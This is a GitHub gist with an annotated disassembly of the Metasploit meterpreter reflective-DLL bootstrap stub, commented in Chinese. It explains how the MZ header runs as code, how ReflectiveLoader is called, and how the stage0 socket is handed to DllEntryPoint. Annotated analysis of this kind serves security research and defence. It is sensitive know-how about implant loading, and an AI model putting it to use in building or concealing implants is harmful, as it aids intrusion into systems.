Last active
January 5, 2019 09:44
-
-
Save Dliv3/c2798f07f07809f01936e435108f6cc1 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; meterpreter部分 | |
| ; https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/meterpreter_loader.rb | |
| ; https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reflectivedllinject.rb | |
| ; http://imosin.com/2017/12/22/meterpreter-think/ | |
| ; https://www.freebuf.com/articles/system/53818.html | |
| ; https://bbs.pediy.com/thread-247616.htm | |
| 003d0000 4d dec ebp ; M | |
| 003d0001 5a pop edx ; Z | |
| 003d0002 e800000000 call 003d0007 | |
| 003d0007 5b pop ebx ; ebx = PE机制+0x7 | |
| 003d0008 52 push edx ; 恢复栈内存 | |
| 003d0009 45 inc ebp ; 恢复ebp | |
| 003d000a 55 push ebp | |
| 003d000b 89e5 mov ebp,esp ; 开辟栈空间 | |
| 003d000d 81c364130000 add ebx,1364h ; ebx = ReflectiveLoader()的绝对地址 | |
| 003d0013 ffd3 call ebx ; call ReflectiveLoader, 返回地址为DllEntryPoint函数地址 | |
| 003d0015 81c395a60200 add ebx,2A695h ; ebx = 将.data段的某个地方作为_MetsrvConfig配置的存储位置 | |
| 003d001b 893b mov dword ptr [ebx],edi ; _MetsrvConfig->session->comms_handle = edi, edi为stage0中传递过来的SOCKET | |
| 003d001d 53 push ebx ; _MetsrvConfig的地址 | |
| 003d001e 6a04 push 4 ; fdwReason = DLL_METASPLOIT_ATTACH | |
| 003d0020 50 push eax ; hinstDLL | |
| 003d0021 ffd0 call eax ; call DllEntryPoint |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment